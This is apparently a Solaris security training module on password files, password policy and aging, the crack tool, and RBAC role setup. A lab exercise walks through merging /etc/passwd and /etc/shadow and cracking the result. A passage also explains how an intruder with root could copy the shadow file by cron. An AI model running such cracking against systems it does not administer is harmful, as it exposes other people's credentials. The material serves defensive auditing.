● Scambray, McClure, Kurtz. Hacking Exposed. Second Edition.Osborne/McGraw-Hill, 2001.

● crack documentation – manual.html from the crack archive onlineat:[ftp://ftp.cerias.purdue.edu/pub/tools/unix/pwdutils/ ]

● npasswd download site:[ftp://ftp.cc.utexas.edu/pub/npasswd ]

● AntiCrack documentation and download at:[http://www.teu.ac.jp/nsit/~tominaga/anticrack/ ]

Passwords


Passwords

With the increasing use of networks and the corresponding increase innetwork-attacking tools, secure passwords are no longer the mostimportant aspect of good system security. However, good passwords arethe first and sometimes the only defense against attacks. Intruders spendsignificant time and effort cracking passwords. The importance of goodpassword selection, protection, and administration, therefore, cannot beover-emphasized.

The superuser password, which gives an intruder system-wide access, isthe most important of all passwords. But individual user passwords areimportant as well, because they are often the first step to obtainingsuperuser passwords.

Revisiting the Password and Shadow Files

Before considering password selection and password-cracking tools, thissection reviews the standard Solaris OE password files and utilities.

Passwords


The /etc/passwd File

The /etc/passwd file contains most of the important information aboutuser accounts. It contains the user name, the user identifier (UID), thegroup identifier (GID), a description field which usually stores the user’sfull name and comments, the path of the user’s home directory, and thetype of UNIX shell to start when the user logs on. An example of anaccount entry is:

alice:x:101:1:Alice:/export/home/alice:/bin/ksh

The fields, separated by a colon (:), from left to right are:

● The user name

● The dummy password field; the character ‘x’ in this field indicatesthat the encrypted password is in the /etc/shadow file

● The UID

● The GID

Passwords


● Free text field (also known as the GCOS field), which usually storesthe user’s full name and other details; be aware that data in theGCOS field might be displayed in outgoing mail headers

● The user’s home directory

● The user’s login shell

It is difficult to maintain up-to-date copies of the /etc/passwd file onevery host in a large network, so the /etc/passwd file is often not used.In the Solaris OE, products such as Network Information Service (NIS) orNIS+ store passwords on a server, using a single password database. Theformat of the database that dispenses the passwords is similar to thepassword file.

Note – When using the NIS, NIS+ or Lightweight Directory AccessProtocol (LDAP) repository for account and password data, encryptedpasswords are passed across the network where they can be sniffed bypotential attackers.

Many standard utilities, such as ls and who, use entries in the/etc/passwd file to map UIDs to user names. For this reason, the/etc/passwd file must have read privileges for the world.

In previous versions of UNIX, when the password file contained theencrypted password, crackers could simply copy the contents of the fileand then use aggressive techniques to attempt to crack user passwords.

With the encrypted password now located in the /etc/shadow file, whichis not readable by regular users, attacks of this kind are no longer possible.

However, do not assume that your password system is secure. Getting alist of users and groups, and where their home directories are, can be thefirst step in the process of breaking in, and the /etc/shadow file can becopied during even brief access to the root account.

Passwords


The /etc/shadow File

Shadow passwords were introduced to increase security. The/etc/shadow file stores encrypted passwords in much the same way asthe /etc/passwd file used to. Because the /etc/shadow file is onlyreadable by the superuser, the encrypted passwords and other importantaccount information (such as account and password aging parameters)cannot be viewed by regular users.

An example of an account entry in the /etc/shadow file is:

alice:sDWSmgh1MzcO2:11428:10:100:5:20:11503:

The fields, separated by a colon (:), from left to right are:

● The user name

● The encrypted password

● The number of days since January 1, 1970, that the password wasmodified

● The minimum number of days required between password changes

Passwords


● The maximum number of days the current password is valid

● The number of days warning that the password will expire

● The number of days of inactivity the account is allowed before itexpires

● The date on which the account expires expressed as the number ofdays since January 1, 1970

There are many programs that analyze the data in these fields andmanage password and account aging and expiration. These are discussedlater in this module (see “Configuring Password Aging” on page 6-16).

Make sure that no backup copies of the /etc/shadow file on your systemare publicly readable.

Passwords


Setting a Password Policy

To have a secure password policy, you must first address the issue of usereducation. You should:

● Impress upon users the importance of keeping their passwordssecret. Emphasize that this is not a casual topic and that sharingthem with other users, family, or even system administrators is avery serious mistake.

● Explain that, if possible, passwords should not be written down. Ifthey must be written down, make sure they are written in a secureplace. A technique used by some intruders is to observe an unwaryuser logging onto a workstation at the start of a workday. If the useris seen glancing into a desk drawer or an address book, the usermight as well write the password down and give it to the intruder.

● Users with different types of accounts (for example, a system accountand a non-administrator account) should use different passwords foreach.

● Prohibit storage of unencrypted passwords on the system or online.Allow no exceptions.

Passwords


● Discuss with users the techniques that crackers might use to obtaintheir passwords. For example, crackers might disguise themselves assystem administrators and send out emails asking users to emailtheir passwords to them. Tell users that they should ignore suchmessages and report them immediately.

● Consider assigning each user a password and then removingexecute permission from the /bin/passwd file for ordinary users, sothat the assigned password cannot be changed.

● Never create a single account for use by multiple users sharing asingle password. Accounts like this are often viewed as less importantthan personal accounts and the password is often known by manymore people than necessary. If someone breaks in using a sharedpassword, accountability is virtually impossible to prove. Instead,create individual accounts with a group identifier in the /etc/groupfile so that users can share files.

● Without exception, do not give the superuser password to anyonethat is not a trusted member of your staff with the sameresponsibility level as you. Keep the number of people who have thisprivilege to a minimum. Remember that every new person whoknows this password becomes a new target for intruders both withinand outside the organization.

● Consider using tools like Role-Based Access Control (RBAC) andsudo (see Module 7, “Securing Root Access”) rather then handing outthe password to the root account to administrators.

Passwords


Choosing Good Passwords

Password-cracking is a science that is in continuous development bysecurity experts and intruders alike. Fast computers and creativeprograms can test millions of passwords per second. Nevertheless,following certain common conventions when choosing passwords (forexample, using at least six characters, and randomly selecting characters,from AAAAAA through all the combinations of available characters on thekeyboard) could stall such cracker programs for several years.

Unfortunately, users rarely choose a completely random set of characters.That is why password-cracking programs take a more intelligentapproach. They start with dictionaries and lists of common words, names,and commonly used passwords of the past.

Given this fact, it is important to select passwords that are virtuallyimpossible to guess. Unfortunately, this can also make them difficult toremember, forcing users to write them down, which is also undesirable.The trick is to find a password that is a balance between all of thesefactors. When you have a password that achieves this sort of balance,memorize it—and then keep it secret.

Passwords


Users might protest the requirement that they must use passwords thatare hard to remember. Nevertheless, do not allow them to use easilyguessed passwords.

Note – The Solaris 8 OE passwd command insists that users enter apassword of at least six characters, containing at least two letters and onenumber or special symbol.

Use and communicate the following list of guidelines when selecting orassigning passwords:

● Do not use any words found, even in part, in the dictionary of anylanguage – Password-cracking programs use dictionaries as astarting point for cracking. Prefixing or appending numerals on tosuch words slows the cracking process only slightly.

● Do not use a combination of the letters of your real name, user name,initials, or nickname – Reversing the order of the letters orscrambling them creates passwords that are easy to crack.

● Do not use a combination of the letters of a famous person’s name.

● Do not use a combination of the letters of a spouse’s, girlfriend’s,boyfriend’s, child’s, or pet’s name – An intruder who knows yourname can find out this information and add it to the list of crackingpossibilities.

● Do not use personalized numbers – For example, avoid socialsecurity numbers, license plates, telephone numbers, bank personalidentification numbers, street addresses, or your favorite car model.

● Do not use a password containing only digits, or all the same letter.

● Do not use a password that is shorter than six characters – TheSolaris OE does not allow you to do this as a regular user, but itallows the superuser to make passwords shorter. There is no point inselecting a long password because only eight characters are used.

Note – The superuser can press the return key for a password. This is notthe same as having no password at all, and will not be spotted byautomated utilities designed to detect accounts with no password. Anencrypted password still appears in the /etc/shadow file.

Recommendations for what users should do include:

● Use a password with mixed-case letters – Capitalizing only the firstletter is not sufficient. Attempt to mix the case in the middle of theword as well.

Passwords


● Use a password that can be typed quickly – This reduces thepossibility of someone watching you and committing the keystrokesto memory as you type them (this kind of watching is called shouldersurfing).

● Use a password that contains special characters – Use characterssuch as ^, $, +, and ~.

The Mnemonic Method – A Way to Remember

A popular way to create secure passwords and remember them is to startwith a phrase that you will remember. Take the first letters of each word ofthe phrase and then insert as many numerals or special characters as youcan.

Another popular technique is to replace some letters with digits.

The most common replacements are:

● Letter i with the digit 1

● Letter o with digit 0

● Letter s with 5

But the following replacements are often seen:

● Letter e with digit 3 (think of a mirror image of a capital E)

● Letter b with 6

● Letter l or v with 7 (think of a capital L or V rotated by 180 or 90degrees respectively)

Taken to extremes this turns the password obelisk in 063715k .

Note – Using the digits 1 and 0 to replace letters i and o is so commonthat password cracking programs such as crack and John the Ripper testfor single letter–digit changes.

For example, you can use the phrase another fine mess to clean up toremember the password aFm2c^.

Other examples are:

● 14$24sh0 – One for the money, two for the show

● mm@F:00– Meet me at four o’clock

Passwords


Using Multiple Words

Using passwords with multiple words combined with a special characteror digit is another good technique. For example:

● head2head

● sound&vision

● ew&fire

● dash-dash

● dot.dot

However, now that these passwords are listed in this text, they could endup in someone’s password-cracking dictionary, so do not use these. Comeup with original ones—and keep them secret!

Passwords


Revisiting the passwd Command

You can create and change passwords using the passwd command. Thepasswd command is accessible to both regular users and the superuser,but users can only change their own passwords, while the superuser canchange any user’s password. Users wanting to change their passwordmust first enter their existing password for authentication (consult themanual page for passwd for other options).

Code 6-1 shows an example of how a user would change his or herpassword. In reality, the password is not echoed to the screen as it istyped, but the password is shown here for convenience.

Code 6-1 Example of a User Changing His or Her Password

1 % passwd2 passwd: Changing password for groucho3 Enter login password: my_PassWD*4 New password: my_PassWD25 passwd(SYSTEM): Passwords must differ by at least 3 positions6 New password: hello7 passwd(SYSTEM): Password too short - must be at least 6 characters.

Passwords


8 New password: groucho9 passwd(SYSTEM): The first 6 characters of the password must containat least two alphabetic characters and at least one numeric or specialcharacter.10 passwd(SYSTEM): Too many failures - try later.11 Permission denied

Regular users have certain restrictions on what they can enter as a newpassword, and the new password must not be too similar to the old one.The passwd command reports an error after three unsuccessful attemptsto change the password. These restrictions do not apply to the superuser.The superuser can enter any characters. Also, the superuser is notrequired to enter the old password before entering the new one.

The superuser can change any user’s password. Because the passwdcommand does not check the new password against security criteria, it isthe responsibility of the superuser to make sure that the new password issecure. To change a user’s password, the superuser enters the passwdcommand followed by the user name, as shown in Code 6-2.

Code 6-2 Example of Superuser Changing a Password

1 # passwd groucho2 New password: afm2c^3 Re-enter new password: afm2c^4 passwd (SYSTEM): passwd successfully changed for groucho

Configuring Password Aging

The password aging facility allows you to constrain the way in which userschange their passwords, and prevents them from using the same familiarpassword for years. Unfortunately, it does not stop them from recyclingtwo or three favorites one after the other.

The passwd command contains several useful options that managepasswords and their aging and expiration. Some of these options areshown in Table 6-1 on page 6-17.

Passwords


Use password aging to ensure that users passwords are changedregularly, but not so regularly as to cause users annoyance. (Once everythree or four months is a good compromise.)

Unfortunately, most users, when forced to change their password, revertto their original password as soon as they can. Set a long minimum time,to force users to become used to the new password. Typically, give usersseven days to change their password, and set the warning period to sevendays as well.

A typical aging command is:

# passwd -n 115 -x 122 -w 7 username

Faced with frequent password changes, users often grow lazy and resort topasswords that defeat the purpose of password aging. For example, userswho must change their passwords every month soon run out of usefulpasswords and take one of the following actions (in probable order ofoccurrence):

● Cycle through two or three favorite passwords.

● Modify the same password using a simple cycle such as adding themonth number or name to the start or end of the password, or usingstar sign abbreviations.

Table 6-1 Options for Managing Password Aging

Option Meaning

-x Sets the number of days from when the passwordwas last changed to when it will expire

-w Sets how many days’ warning is given to the userbefore the password expires

-n Sets the minimum number of days before thepassword can be changed

-f Forces users to change their passwords when theynext log in

-l Sets the encrypted password to *LK* , whichprevents the user from logging in

-s Lists the current parameters on an accountpassword

Passwords


● Think up a good password and then forget it by lunch time so thatthey have to get help resetting their password.

● Pretend they have forgotten their new password and get you to resetthe password so that they can enter their previous password andbypass the enforced change.

Unfortunately, there is not much you can do to prevent this. As long asthe password selected is a secure one, there is no real harm. Reinforcewith your users the password selection policy described earlier (see“Setting a Password Policy” on page 6-9), and follow the steps to checkfor weak passwords with crack or other tools (see “Using the crack Toolto Find Weak Passwords” on page 6-27).

Configuring Default Password Aging

Restrictions on passwords can be controlled for all non-administratorusers by adding entries to the /etc/default/passwd file. By setting thevariables shown in Table 6-2, you can manage the default passwordexpiration periods and other required password standards for all userswhen they change their passwords.

Table 6-2 Setting Default Password Expiration Periods

Code Meaning

MAXWEEKS=17 The user must change the password at leastevery four months.

MINWEEKS=4 Four weeks must elapse before the passwordcan be changed.

WARNWEEKS=1 A warning is given one week before thepassword must be changed.

PASSLENGTH=8 The password must contain eight characters.

Passwords


Checking for Accounts With No Password

Even though you can create accounts without passwords, to do so isasking for trouble. Even though there are no restrictions on what thesuperuser can use for a password, you never want to create an accountwithout a password.

Because it is possible to create accounts without passwords, it is alsopossible to check whether such accounts exist. Use the logins commandwith the -p option to see if any user on the system is missing a password.The following example indicates that user groucho is missing a password:

# logins -pgroucho 401 other 1

The first time that a user logs in to an account that has no password, theuser must enter a password. However, if the user logging in is an intruder,the intruder can set the password, thereby gaining unrestricted access tothat account. In the extremely unlikely event of a superuser having nopassword, the intruder can continue to login without a password timeafter time, without any restrictions.

Passwords


Certain special accounts, such as sys and bin , have a special ‘nopassword’ status, indicated by the appearance of NPin the encryptedpassword field of the /etc/shadow file. This means that there is no validpassword entry for these accounts, and these accounts cannot be used forinteractive login sessions.

Passwords


Using Password Generators

In some special, high-security situations, it might be necessary topre-qualify a password before a user can use it. There are many programsthat can generate a list of secure passwords for a user to select from. Thesepasswords are created from randomly chosen characters and are virtuallyimpossible for cracking programs to crack.

Unfortunately, because the generated passwords are made up of a randomsequence of characters, they are easy to forget. Users generally want towrite the passwords down somewhere. Therefore, use generatedpasswords only when necessary.

Less secure, but more usable password generators combine multiplewords (often related) from the dictionary.

Passwords


Another approach is to have a user submit a password that they feel theycan remember, and then run the password through a password-crackingprogram (see “Using the crack Tool to Find Weak Passwords” onpage 6-27). If the password fails to be cracked in a reasonable time, acceptthe password and assign it to the user.

Passwords


One-Time Passwords

Because passwords can easily be ‘sniffed’ if users regularly access thesystem over the Internet or a network, consider the use of one-timepasswords. As the name implies, a one-time password is a password thatis used only once.

Two popular one time password systems are:

● One-time Passwords In Everything[http://www.inner.net/opie ]

● S/Key[ftp://ftp.cerias.purdue.edu/pub/tools/unix/netutils/skey/ ]

Many systems are available which involve the use of smart cards,password generators, or code books, and many vendors supply them.

Passwords


One of the most secure is SecureID, which requires each user to carry asmall number generator about the size of a large key fob or small cigarettelighter. The number generator provides a new (numeric) password every60 seconds. A similar number generator is provided on the server tomaintain the user’s account password. The password required by the userusually includes a four to eight digit PIN number which must beappended to the generated random number providing additional securityagainst theft of the number generator.

Cracking Password Programs


Cracking Password Programs

A less drastic approach to password security than preventing users frompicking their own or using password generators, is to test user passwordsto identify those that are easy to guess. It is relatively easy to write yourown password-cracking program, but there are also a number that arefreely available. The most well known include:

● crack

● John the Ripper

● monkey

● l0pht for Microsoft Windows

Cracking Passwords Using the crack Tool



The crack tool is a utility that guesses passwords by encrypting words orsets of characters and comparing them to the encrypted password in the/etc/shadow file. The crack tool is only useful to an intruder that hasaccess to the /etc/shadow file.

The advantage of password-cracking is that it can be done offline, so thatwhen the encrypted passwords have been obtained, there is no evidenceon the system that anything unusual is happening.

The crack tool draws its input from a number of dictionary files. It alsoapplies thousands of rules to the dictionary words to try to guesspasswords that would otherwise seem impossible to crack. Thedictionaries are updated and expanded on an ongoing basis to includeeverything from U.S. presidents to Star Trek terms. The crack tool alsoadds the words in the GCOS field in the /etc/passwd file to its dictionarylist.



Using the crack Tool to Find Weak Passwords

Running crack (or a similar tool) on a regular basis is a useful securitycheck, but do not use it as an alternative to educating your users to selectsecure passwords.

If the crack tool finds an account with an insecure password, you shoulddisable this account immediately or, at least, change the password, andnotify the owner.



Installing and Running the crack Tool

The crack version 5.0 package can be downloaded from the followinglocation, and must be compiled locally:

ftp://ftp.cerias.purdue.edu/pub/tools/unix/pwdutils/

The crack tool produces more useful output if the files /etc/passwd and/etc/shadow are merged to create a file with the format of an old UNIXC1 password file. The crack tool provides a script to do this. Use thismerged file as the input to the crack tool.

When invoked, the crack tool runs a separate background process calledcracker to attempt to crack the passwords, and writes its results to atemporary data file. Because the cracker process can take considerabletime to complete, monitor progress with the ps command and use theReporter command to periodically view the results.

Caution – Do not leave a password-cracking program on your systemwhere it can be executed by regular users. Do not store the output of theprogram anywhere.

Tools for Setting Good Passwords


Tools for Setting Good Passwords

There are freeware packages available that strengthen the passwdprogram by not allowing users to pick easy-to-guess passwords. Theseinclude:

● npasswd

● passwd+

● anlpasswd

These and other programs can be found on the Internet. (See “AdditionalResources” on page 6-3 for the download site for the best known of theseprograms, npasswd .)

Another useful tool is AntiCrack , a password-checking program, thatuses the same rules and dictionaries as the crack program. The onlydifference is that you use the AntiCrack program to check a ‘raw’ (non-encrypted) UNIX password, so it is far faster than the crack tool. Use theAntiCrack program to check how secure a password is before using it.

Exercise: Securing Passwords




● Install and configure the crack tool

● Use the crack tool to find insecure passwords on your system

● Check your favorite passwords with the crack tool

Preparation

There is no preparatory work for this module.

Tasks


Task – Installing and Configuring the crack Tool

The crack version 5.0 package can be downloaded from:

ftp://ftp.cerias.purdue.edu/pub/tools/unix/pwdutils/

A copy has already been downloaded and saved in the /usr/local/pkgdirectory. To install and configure the crack tool:

1. Unpack the downloaded file (crack5_0.tar ) using the tarcommand to create the directory crack50a . Follow the instructionsand install the crack tool in the file manual.html (or manual.txt )in the crack50a directory.

2. Edit the following two files to use the gcc compiler rather than thecc compiler:

/usr/local/crack50a/Crack/usr/local/crack50a/src/libdes/Makefile.uni

3. Compile the crack tool as described in the manual.



Task – Running the crack Tool Against the SystemPasswords

The crack tool works best if the password data (user name, GCOS data,and so on) and the encrypted passwords are both used as source data. Dothis by merging the files /etc/passwd and /etc/shadow to create atemporary file which has the format of an older UNIX C1 password file.The crack tool provides a script to do this in the scripts directory.

1. Run the following script to create a temporary file to crackpasswords:

# cd /usr/local/crack50a# scripts/shadmrg.sv >passwords

2. Run the crack tool against the combined passwords file:

# ./Crack passwords

1. This runs a separate background process called cracker thatattempts to crack the passwords. You can see this process by usingthe ps command or the top utility.

The crack tool writes its results to a data file and not to standardoutput. Use the Reporter command to periodically view the results,as follows:

# ./Reporter -quiet

If you have not changed the passwords for the users alice , bob , oreve , the crack tool will find bob’s password (b0bb0b ) almostimmediately, but will take about 15 minutes to guess alice’s(w0nder ) and will not guess eve ’s (3v3adam).

If you just run the crack tool against the shadow file (crack onlyneeds the encrypted password) as follows:

# ./Crack /etc/shadow

then it will fail to find bob’s password.

2. Stop the crack tool by entering:

# scripts/plaster



3. Clear any existing cracked password list using:

# make tidyso that a new clean run can be attempted.

4. How much of a threat do you think the crack tool is against modernC2 secure Solaris OE systems?

Task – Using the crack Tool to Check FavoritePasswords

1. Create a user account for yourself with a command such as:

# useradd -m -s /usr/bin/ksh test1

2. Use passwd to set the password for the test1 account – use one ofyour usual passwords.

3. Repeat these steps for as many passwords as you want to test,naming each extra account test2 , test3 , and so on. Remember thatyou might have already added a guest account as part of theexercises for Module 5.

4. Merge your entries in the /etc/passwd and /etc/shadow files into afile for the crack tool, using:

# cd /usr/local/crack50a# scripts/shadmrg.sv | grep 'test[0-9]*$' >mypasswords

5. Run the crack tool on this file after stopping the existing crack runand tidying the data files:

# scripts/plaster# make tidy# ./Crack mypasswords

6. Repeat these steps for all the passwords you want to test.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions

In this exercise, you will use the crack tool to verify the security (orotherwise) of passwords on the system.

Installing and Configuring the crack Tool

Install and configure the crack tool as follows:

1. Unpack the crack5_0.tar file into the /usr/local directory using:

# cd /usr/local# tar xvf pkg/crack5_0.tar# cd crack50a

Study the manual.html or manual.txt file for instructions. Thecrack tool needs compiling and requires some changes to the crackscript and makefile.uni , as described in the crack manual andexplained in the solutions section. The Solaris OE uses the standardcrypt() mechanism for encrypting passwords.

2. Edit the crack script, comment out the line start CC=cc (#CC=cc),and uncomment the line #CC=gcc (CC=gcc).

3. Make the same two edits to the src/libdes/Makefile.uni file.

4. Compile crack using:

# cd /usr/local/crack50a# ./Crack -makeonly# ./Crack -makedict

Running the crack Tool Against the System Passwords

There is no solution to this exercise. You should follow the instructionsprovided on page 6-31.

Is the crack tool a threat against modern C2 secure Solaris OE systems?This depends on how secure the /etc/shadow file is. The defaultpermissions mean that only the root user can read the file. If an intrudergains root access, the intruder can leave a back door open and copy theshadow file to a user-readable file on a regular basis (perhaps using thecron command). This means that even when the root password changes,the intruder can crack the new password.

Exercise Solutions


If the intruder gets a copy of the /etc/shadow file from a backup tape orby ‘sniffing’ the network (both subjects are presented later in this course),then crack is another tool that the intruder can use.

Nevertheless, these days crack is a limited threat to C2 secure SolarisOEs.

Using the crack Tool to Check Favorite Passwords

If crack failed to guess your passwords – congratulations!

If your passwords have been cracked, you must rethink the way youchoose your favorite passwords.

Did crack find the password you set for the guest account in Module 5?


Module 7

Securing Root Access

Objectives


● Configure and use Role Based Access Control (RBAC)

● Configure and use the sudo utility

Relevance


Relevance

?!

Discussion – The following questions are relevant to understandingrestricting root access to a system:

● Why not let everyone have root access?

● Do you know how many administrators have the root password foryour systems?

● Do you know what these administrators do on a daily basis?

● Do these administrators need full root access or would a subsetof commands suffice?

● Are these administrators trustworthy?

● How can you enable a user to do privileged operations (such asbackups) without giving them full superuser privileges?


Securing Root Access 7-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● Solaris OE manual pages for auths(1) , profiles(1) , roles(1) ,roleadd(1M) , rolemod(1M) , useradd(1M) , usermod(1M) ,auth_attr(4) , exec_attr(4) , prof_attr(4) , and user_attr(4)

● Solaris AnswerBook version 2.

● Garfinkel, Simson and Gene Spafford. Practical UNIX & InternetSecurity. O’Reilly & Associates, Inc. 1996.

● Frisch, Aeleen. System Administration. 2nd Edition. O’Reilly &Associates, Inc., 1995.

● Winsor, Janice. Solaris System Administrator's Guide. 3rd Edition.Prentice Hall, 2000.

● Gregory, Peter H. Solaris Security. Prentice Hall, 1999.

Tool Downloads

● sudo precompiled Solaris OE package format,[http://www.sunfreeware.com/ ]

● sudo online resources,[http://www.courtesan.com/sudo ]

Controlling Root Access


Controlling Root Access

A major security problem with UNIX (and therefore with the Solaris OE)is that the superuser is so powerful and that other users are not powerfulenough to fix their own problems. That is, there is not enough fine-grainedcontrol over the allocation of functionality to users. UNIX security is verymuch all (the root user) or nothing (everyone else).

Unless the system size and complexity is very small or the systemadministrator is super-human, secure system administration requiressome superuser functionality to be available to a number of users. Tocontrol the actions of those users, it is useful to give them access to someprivileged commands without giving them full superuser access. There aretwo approaches to providing this functionality:

● Role Based Access Control (RBAC) – A solution based on setting uproles, profiles, and authorizations. RBAC is specific to Solaris OE, butother flavors of UNIX might have a proprietary package that providessimilar functionality.

● The third-party sudo utility – A portable solution, easy to configure,that can be used on heterogeneous UNIX platforms, not just theSolaris OE.

Solaris OE Role Based Access Control (RBAC)



RBAC extends the basic access control for Solaris OE commands to allowany user to borrow certain UIDs when running particular commands.RBAC privileges are associated with either an individual user or a role. InRBAC, roles are preferred, because they simplify the management of largenumbers of users. The user or role privileges support the ability to run asingle command or a group of commands known as a profile. Groupingcommands into profiles makes it easier to assign common sets ofcommands to multiple roles.

The RBAC authorization mechanism also supports other Solaris OEsecurity packages such as Basic Security Module (BSM).



Understanding RBAC Concepts

RBAC is built around the concepts of authorizations, roles, and profiles.Roles and profiles allocate extra command privileges, and authorizationsgrant access to functionality such as devices in BSM (see Module 3, “TheSolaris OE Basic Security Module”).

Using Profiles

A profile is a grouping of one or more commands that simplifies theallocation of a single block of commands to multiple users. One or moreprofiles are usually allocated to roles.

Use the profiles(1) command to view a list of a user’s profiles (omit theusername to view the profiles for the current user):

# profiles alice

Using Roles

A role is a special type of user account that performs a set ofadministrative tasks. Typically a role contains one or more profiles and auser is associated with one or more roles to gain access to restrictedfunctionality.

Use the roles(1) command, which accepts an optional username as asingle parameter, to view a list of a user’s roles (omit the username toview the roles for the current user):

# roles alice

Using Authorizations

An authorization is a name associated with the right to access restrictedfunctionality (typically devices under BSM). Use the auths(1) commandto view a list of a user’s authorizations (omit the username to view theauthorizations for the current user):

# auths alice



RBAC Commands

You can maintain the configuration files manually or use the commandsshown in Table 7-1.

Table 7-1 RBAC Commands

Command Meaning

roleadd Creates the roles and associates a role with anauthorization or a profile (the -A and -P options,respectively

rolemodandroledel

Provide support for modifying and deleting roles

useradd Provides support for associating users with roles,profiles, and authorizations using the -R , -P, and-A options, respectively

roles ,profiles ,and auths

List users’ allocated roles, profiles, andauthorizations, respectively



Configuring RBAC Profiles

The Printer Management profile is a standard profile defined in the/etc/security/exec_attr file, as shown in Code 7-1.

Code 7-1 Standard Printer Management Profile

1 Printer Management:suser:cmd:::/usr/sbin/lpshut:euid=02 Printer Management:suser:cmd:::/usr/bin/cancel:euid=03 Printer Management:suser:cmd:::/usr/bin/enable:euid=lp4 ...



The /etc/security/exec_attr file contains several other lpadministration commands defined in a similar manner as those shown inCode 7-1 on page 7-8. In the fragment shown in Code 7-1 on page 7-8, anyuser with the Printer Management profile can run the commands shownin Table 7-2.

The two fields after the profile name define the superuser security policyand the entity type of command. These fields are fixed as suser and cmd,and should not be altered.

There is one standard profile called All which is defined in the/etc/security/exec_attr file as:

All:suser:cmd:::*:

This profile allows the user to run any command with no specialprivileges (using their current UID and GID). It is usual to grant all roleusers access to the All profile. If the user is not given access to the Allprofile, the user can only run the commands in their roles when runningthe profile shell.

You must use the configuration file, /etc/security/prof_attr , todefine the profile, as used in the /etc/user_attr file:

Printer Management:::Manage printers:help=PrinterMgmt.html

This file links the profile with additional information, such as adescription and a help file. Use this file with GUI tools for working withthe database.

Note – Currently there are no GUI tools for working with the RBACdatabase files.

Table 7-2 Commands for the Printer Management Profile

Command Meaning

/usr/sbin/lpshut as root(effective UID of 0)

Lets the user stop the printersystem

/usr/bin/cancel as root(effective UID of 0)

Lets the user cancel print jobsfor any user

/usr/bin/enable as lp(effective UID of lp )

Lets the user enable an offlineprinter



Adding RBAC Profiles

There are no commands for maintaining profiles, so the two configurationfiles must be edited manually with a text editor, such as vi .

To add a new profile, give the new profile a name by creating an entry inthe /etc/security/prof_attr file. For example, a new profile for usermanagement, called User Management , is created using the new entry:

User Management:::Manage user accounts:

You must add the required commands for this profile to the/etc/security/exec_attr file. For example:

1 User Management:suser:cmd:::/usr/sbin/useradd:euid=02 User Management:suser:cmd:::/usr/bin/usermod:euid=03 User Management:suser:cmd:::/usr/bin/passwd:uid=0

The passwd command requires the real UID to be that of the root user(zero) whereas usermod and useradd only require the effective UID to bezero.



Using RBAC Roles and Profiles

The key concept for RBAC is using roles to grant access to one or morecommands which are executed using the privileges of another user(typically the root user). The commands themselves are associated withprofiles and the roles are associated with one or more profiles. Users canbe associated with one or more roles or profiles.

Profiles are defined in configuration files, and a role is a special type ofuser account that is intended for performing a set of administrative tasks.The role account is like a regular user account, except that users can gainaccess to it only by using the su command; it is not accessible for regularlogins.



A role user must be assigned one of the profile shells below:

● /usr/bin/pfsh for Bourne shell

● /usr/bin/pfksh for Korn shell

● /usr/bin/pfcsh for C shell

A profile shell is required so that commands are executed with theattributes specified by the user’s profiles in the /etc/exec_attr databasefile.

You do not need to create a home directory for a role user because rolesshould not be used for regular logins, only as the target of a su command.The role account needs a password to enable the user to assume the role.



Creating Roles

Use the command useradd to create the role. Alternatively, use thecommand roleadd to create the role and add authorization or profileentries to the configuration file /etc/user_attr .

For example, if a profile called Printer Management has been defined(this is a default role provided with Solaris 8 OE), then a new roleassociated with this profile can be created, as shown in Code 7-2.

Code 7-2 Example: Creating a New Role

# roleadd -P "Printer Management" Printers# passwd Printers



The roleadd command verifies that the required profile (PrinterManagement ) is defined in files /etc/security/prof_attr and/etc/security/exec_attr. shows sample configuration files.

Code 7-3 Role Configuration Files

# grep Printers /etc/passwdPrinters:x:111:1::/home/Printers:/bin/pfsh# grep Printers /etc/user_attrPrinters::::type=role;profiles=PrinterManagement



Assigning Roles and Profiles

To understand the function of the RBAC configuration files, examine howan example user is granted access to the line printer administrationcommands. (The full format of the configuration files is not describedhere. See the online manual pages for full details.)

To define a role, the role must be added to the /etc/user_attr file (andmust also have an account entry in the /etc/passwd and /etc/shadowfiles). Use the roleadd (1M) command to create the necessary entries ifyou use the -P option (as in Code 7-2 on page 7-13):

# roleadd -P "Printer Management" Printers

This command adds the following line to the /etc/user_attr file:

Printers::::type=role;profiles=Printer Management



Each user that needs access to that role must also be added to the/etc/user_attr file. Use the usermod command (or useradd if creatinga new user) to create this entry:

# usermod -R Printers alice

This command grants alice access to the Printers role. The Printersrole gives access to the Printer Management profile (see Code 7-1 onpage 7-8). It is usual to also grant a user access to the profile All , which ispresented later. Without this profile, the user can only access thecommands in their allocated role. For example:

# usermod -R Printers -P All alice

This adds the following line to the /etc/user_attr file:

alice::::type=normal;roles=Printers;profiles=All

Note – The -R and -P options replace any existing role or profile settings.



Assuming a Role

Using a role account, a user can access commands with special attributes(typically root user ID), which are not available to users using regularaccounts. A user gains access or assumes a role using the su command:

# /bin/su Printers

The parameter to the su command is the role name Printers rather thana user name (roles are defined like users and have an entry in the/etc/passwd file).

After running the example su command and supplying the password forthe role (Printers ), the user is now running a profile shell (the default isthe Bourne shell /usr/bin/pfsh ). The user only has access to thecommands defined for that role (the printer administration commands).Some of these commands can be given special privileges such as theability to run as root (or lp in this example).



Evaluating RBAC

RBAC provides a flexible but complex means of allocating a subset ofsuperuser functionality to one or more users. The mechanism can appearconfusing because there is no obvious requirement for three differentmechanisms—profiles, roles, and authorizations—to support runningsome commands with superuser privileges. In practice, RBAC supportsother Solaris OE features such as BSM, which accounts for the range offunctionality.

RBAC gives you fine-grained control over allocating access of privilegedcommands to individual users or groups of users. You can approximatethe features of RBAC through the careful configuration of user groups andthe SETGID functionality of commands, but you will not get the ease ofadministration and separation of functionality.

The configuration files are general purpose and have many columns ofdata which are currently unused. Therefore, you must count colonscarefully when manually editing the files. Use the command line tools tosimplify the maintenance of the RBAC files.



RBAC is not available on all UNIX platforms and will not appeal toadministrators working in a heterogeneous environment because thesystem administrators cannot use the same technology to administer allplatforms.

RBAC can run a profile shell which extends the capabilities of the user toinclude some privileged commands. The user must memorize anotheruser account name (role name) and password, but when the role has beenassumed, the permitted commands are run as usual.

The sudo Utility


The sudo Utility

The sudo utility lets trusted users perform certain functions as thoughthey were root users, by providing access to a limited set of privilegedcommands. These users use their own password for authorization, and donot need to memorize another password.

